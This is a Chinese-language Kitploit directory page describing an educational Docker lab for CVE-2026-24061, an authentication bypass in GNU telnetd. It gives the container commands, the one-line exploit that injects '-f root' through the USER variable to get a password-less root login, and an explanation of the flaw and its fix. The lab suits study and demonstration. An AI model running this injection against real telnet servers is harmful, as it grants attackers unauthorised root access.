Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061_Lab — # 教育性 Docker 实验环境,演示 CVE-2026-24061——GNU telnetd 中的身份验证绕过漏洞,该漏洞允许通过 USER 环境变量中的参数注入获取 root 访问权限。 | Kitploit
工具/GitHubGitHub/gabs-hub/cve-2026-24061_lab
漏洞分析漏洞利用身份验证学习与教育实验室与实践
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

# 教育性 Docker 实验环境,演示 CVE-2026-24061——GNU telnetd 中的身份验证绕过漏洞,该漏洞允许通过 USER 环境变量中的参数注入获取 root 访问权限。

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 Telnetd 实验室

本仓库包含一个简单的 Docker 实验室,用于演示 CVE-2026-24061 漏洞。 该漏洞允许在 Linux 上的 GNU telnetd 中绕过身份验证并以 root 身份访问。

其目的纯粹是教育性的。

要求

  • 已安装 Docker
  • 已安装 Telnet 客户端

构建镜像

root@kitploit:~
docker build -t cve-2026-24061 .

运行容器

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

漏洞利用

在另一个终端中,执行:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

之后,将直接以 root 身份授予访问权限,无需密码提示。

注意事项

  • 该容器使用存在漏洞的 GNU inetutils telnetd 版本
  • Telnet 服务不应暴露在真实环境中
  • 请仅将此实验室用于学习和演示

该漏洞是如何运作的?

该缺陷源于在调用 /usr/bin/login 工具时发生的参数注入。telnetd 动态构建用于调用 login 的命令行,并通过占位符 %U 包含环境变量 USER 的值,且未进行任何清理。

由于 login 工具接受 -f 选项(该选项会忽略密码身份验证),攻击者可以设置 USER="-f root" 并强制直接以 root 身份登录。

由于 telnetd 以高权限运行,这种操纵会立即产生 root shell,无需有效凭据。该漏洞利用简单,无需事先交互,且易于自动化,这解释了其 CVSS 9.8 的评分。

该漏洞已通过引入对 USER 变量的验证和清理得到修复,阻止以连字符开头及包含特殊字符的值,从而防止对 login 的参数注入。

下载工具